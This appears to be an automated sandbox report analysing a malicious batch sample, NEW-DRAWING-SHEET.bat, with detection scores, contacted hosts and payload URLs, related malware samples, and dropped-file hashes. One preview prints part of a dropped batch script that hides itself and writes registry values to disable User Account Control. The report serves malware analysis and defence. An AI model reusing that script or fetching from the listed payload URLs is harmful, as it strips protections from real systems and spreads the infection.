Disables UAC (registry) 40->80

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NEW-DRAWING-SHEET.bat34%VirustotalBrowse
          NEW-DRAWING-SHEET.bat24%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://paste.fo/raw/a1af5a4d03010%Avira URL Cloudsafe
          http://paste.fo0%Avira URL Cloudsafe
          https://raw.githubuserc0%Avira URL Cloudsafe
          https://paste.fo0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          raw.githubusercontent.com
          		185.199.111.133
          		truefalse
            		high
            www.google.com
            		142.250.185.100
            		truefalse
              		high
              paste.fo
              		172.67.144.225
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zipfalse
                  		high
                  https://paste.fo/raw/a1af5a4d0301true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.ver)svchost.exe, 00000011.00000002.2922057231.000001EB8E600000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://g.live.com/odclientsettings/ProdV2.C:edb.log.17.dr, qmgr.db.17.drfalse
                                    		high
                                    https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/7z2408-x64.exe&NEW-DRAWING-SHEET.batfalse
                                      		high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/Prod.C:edb.log.17.dr, qmgr.db.17.drfalse
                                          		high
                                          https://g.live.com/odclientsettings/ProdV2edb.log.17.dr, qmgr.db.17.drfalse
                                            		high
                                            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.drfalse
                                              		high
                                              https://paste.fopowershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DB9BC000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://oneget.orgXpowershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://paste.fopowershell.exe, 00000004.00000002.1742423417.00000218DB9C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://raw.githubusercNEW-DRAWING-SHEET.batfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drfalse
                                                          		high
                                                          https://oneget.orgpowershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            239.255.255.250
                                                            		unknownReserved
                                                            		unknownunknownfalse
                                                            172.67.144.225
                                                            		paste.foUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            142.250.185.100
                                                            		www.google.comUnited States
                                                            		15169GOOGLEUSfalse
                                                            185.199.111.133
                                                            		raw.githubusercontent.comNetherlands
                                                            		54113FASTLYUSfalse

                                                            Private

                                                            IP
                                                            192.168.2.4
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1582348
                                                            Start date and time:2024-12-30 11:39:20 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 37s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:51
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:NEW-DRAWING-SHEET.bat
                                                            Detection:MAL
                                                            Classification:mal100.evad.winBAT@93/40@5/6
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 3
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .bat

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.186.46, 64.233.166.84, 172.217.16.206, 84.201.210.36, 192.229.221.95, 172.217.18.110, 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                            • Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            05:40:15API Interceptor118x Sleep call for process: powershell.exe modified
                                                            05:40:25API Interceptor2x Sleep call for process: svchost.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            239.255.255.250http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                                              securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                                                https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                                                  sysmonconfig.xmlGet hashmaliciousUnknownBrowse
                                                                    https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                      https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                        https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6aGet hashmaliciousUnknownBrowse
                                                                          http://stoss3.libooc.comGet hashmaliciousUnknownBrowse
                                                                            PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                              EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                raw.githubusercontent.comfxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                • 185.199.108.133
                                                                                8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                • 185.199.111.133
                                                                                Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                • 185.199.108.133
                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.110.133
                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 185.199.110.133
                                                                                Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                • 185.199.110.133
                                                                                BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                • 185.199.110.133
                                                                                Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                • 185.199.108.133
                                                                                paste.foBank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                • 104.21.28.76
                                                                                SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeGet hashmaliciousXWormBrowse
                                                                                • 104.21.28.76
                                                                                confirmationcr.vbsGet hashmaliciousRedline ClipperBrowse
                                                                                • 104.21.70.240
                                                                                9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.21.70.240
                                                                                9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.21.70.240

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                FASTLYUShttps://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                • 151.101.2.137
                                                                                star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 167.83.165.108
                                                                                EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                • 151.101.2.137
                                                                                installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                                • 151.101.65.21
                                                                                https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                • 151.101.129.44
                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.194.137
                                                                                fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                Hwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                                • 151.101.66.137
                                                                                rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 151.101.129.91
                                                                                rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 151.101.1.91
                                                                                CLOUDFLARENETUSJx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                • 162.159.128.233
                                                                                Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                • 188.114.97.3
                                                                                Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.96.3
                                                                                6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                http://i646972656374o6c6373o636f6dz.oszar.com/Get hashmaliciousUnknownBrowse
                                                                                • 104.16.79.73
                                                                                securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                https://visa-pwr.com/Get hashmaliciousUnknownBrowse
                                                                                • 104.18.28.104
                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                • 104.21.72.190

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0eRequested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 172.67.144.225
                                                                                lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                • 172.67.144.225
                                                                                GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                • 172.67.144.225
                                                                                Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                • 172.67.144.225
                                                                                aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.144.225
                                                                                aYu936prD4.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.144.225
                                                                                VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                • 172.67.144.225
                                                                                SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                • 172.67.144.225
                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.144.225

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):1.3073835731521888
                                                                                Encrypted:false
                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvri:KooCEYhgYEL0In
                                                                                MD5:2CB11036E8188C3C64C13CED8996A22D
                                                                                SHA1:CFCC8503EC37F02CB9CE10B5BBEFA0F30D7A0A4F
                                                                                SHA-256:5F9384FA02A07192BD82BECB1B5ED8F4CC9AAC329A611C2CCB64640B7BF03C5A
                                                                                SHA-512:712108AEE0EFF166F3C5C0C002CDE6A9A9CBF27AE7FE62C4442206AD64C95FCC390C0B3BBB7FC30C67B8B4C7ADDB61EED7FC5B004EC286C58ECCE82239D2B317
                                                                                Malicious:false
                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8ebec10c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.4222029158049839
                                                                                Encrypted:false
                                                                                SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                                MD5:61BD69953F9ADBBFBB6410C5C6D988E9
                                                                                SHA1:6DE547391505EB6513F2A760B583AF204AC8C30C
                                                                                SHA-256:CAC343FF3CD752D29DFCC23E72AD23C5E0A728A5EC61C363AE6FB5D3AA969766
                                                                                SHA-512:0A6E7CC922FD5AC0F849A751F8B7671D340D32B1A46C17C4D283DF05306EC6ED6C9CE200784EF72DAD1B5D1B314CDF1AAAC742EDA664661BE5377163397C848A
                                                                                Malicious:false
                                                                                Preview:....... .......A.......X\...;...{......................0.!..........{A..(...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................3..(...|...................s..(...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.07710604338203877
                                                                                Encrypted:false
                                                                                SSDEEP:3:KyKYeLMejjn13a/z977llcVO/lnlZMxZNQl:KyKzLfj53q5FOewk
                                                                                MD5:C89541E9A8698A58C02351EBACEBFF46
                                                                                SHA1:E7DC3977A53F54133F36C5B6AEBA6E1C9F7B32B8
                                                                                SHA-256:8DFEE50382F3628E66D8F86341DDBD6CACE66B977BE59EDA0C9C60043604135F
                                                                                SHA-512:5A43E5DA9A021AF9D69EFBDE60EAD493CE8EB09FD8E42CC45B443ED9ABE9E92A28EBC1E6EDC2B1683975D2B9F8D03B1E61B3D29EF8E8722D1DFB4CCF3053961E
                                                                                Malicious:false
                                                                                Preview:.........................................;...{...(...|.......{A..............{A......{A..........{A].................s..(...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................

                                                                                C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1674
                                                                                Entropy (8bit):5.289633803958584
                                                                                Encrypted:false
                                                                                SSDEEP:48:765ijMiUQnQ5IyQ0m3FHY4AJ4tppICkQ865C6H3QBjHQHuHU904:765QMiUQnQ5y1865v
                                                                                MD5:45A66AFA3B07B3143F0D0C3515898BAE
                                                                                SHA1:CC5BAF0C4D2FC0B034974786F20087E058915693
                                                                                SHA-256:8A8C558B5CB169E5D2967DC3E69CB26174BDD8D457903F074477EF1C555B4FB6
                                                                                SHA-512:04AEE35C068225EC8982FC273FD4E4E172CF336B26561D5B8C7CCF3FE972C485B962D01BDCFAB2A27FE456364114417DC3C44852D8431DEF9A04812E8008106F
                                                                                Malicious:true
                                                                                Preview:@echo off..setlocal ENABLEDELAYEDEXPANSION....:: ????? ??????? ?????? ?????..set "cmd_reg=reg.exe ADD"..set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"..set "reg_params=/t REG_DWORD /d 0 /f"..set "ps_cmd=PowerShell -Command"....:: ????? ???????? ?? ??? ????..if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit....:: ????? ????? ????????? ???????? ????????? ?????? ??????..!cmd_reg! !policy_path! /v EnableLUA !reg_params!..!cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!..!cmd_reg! !policy_path! /v EnableUIADesktopToggle !reg_params!..!cmd_reg! !policy_path! /v EnableVirtualization !reg_params!..!cmd_reg! !policy_path! /v EnableUwpStartupTasks !reg_params!..!cmd_reg! !policy_path! /v EnableSecureUIAPaths !reg_params!..!cmd_reg! !policy_path! /v EnableFullTrustStartupTasks !reg_params!..!cmd_reg! !policy_path! /v EnableCursorSuppression !reg_params!..!cmd_reg! !policy_path! /v DSCAutomationHostEnabled !reg_pa

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02bgz12x.v51.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20qmmmei.b0z.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rirnlnw.qzx.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aor2qyh.5ar.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dp3etj1.4sr.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jto4qvs.lgk.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a5xlktm.gtf.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
